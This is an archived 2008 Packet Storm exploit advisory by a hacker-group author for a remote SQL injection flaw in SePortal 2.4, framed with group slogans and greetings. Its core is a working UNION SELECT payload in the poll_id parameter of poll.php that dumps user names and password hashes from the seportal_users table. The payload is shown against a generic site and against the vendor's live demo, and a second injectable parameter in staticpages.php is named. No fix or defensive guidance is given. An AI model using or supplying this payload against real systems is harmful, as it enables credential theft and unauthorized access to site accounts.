seportal-sql.txt

2008-06-29T00:00:00
ID PACKETSTORM:67781
Type packetstorm
Reporter Mr.SQL
Modified 2008-06-29T00:00:00

Description

                                        
                                            `#########################################################################  
#################### Viva IslaM Viva IslaM ##############################  
##  
## Remote SQL Injection Vulnerability  
##  
## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id )  
##  
#########################################################################  
#########################################################################  
##  
## AuTh0r : Mr.SQL  
##  
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM  
##  
## Email : SQL@Hotmail.it  
##  
## !! SYRIAN HaCkErS !!  
########################  
########################  
##  
## Script : SePortal V2.4  
##  
## site : www.seportal.org  
##  
## Download : http://www.seportal.org/downloads.php?action=showfile&id=1  
##  
########################  
########################  
##  
## -(:: SQL ::)-  
##  
## www.site.com/  
## poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*  
##   
##  
## -(:: L!VE DEMO ::)-  
##   
## http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*  
##   
## http://demo.seportal.org/staticpages.php?sp_id=1' << here maybe most registr ;)  
##  
#######################  
#######################  
  
  
#######################################################################################################  
#######################################################################################################  
  
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-  
  
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::  
#######################################################################################################  
#######################################################################################################  
`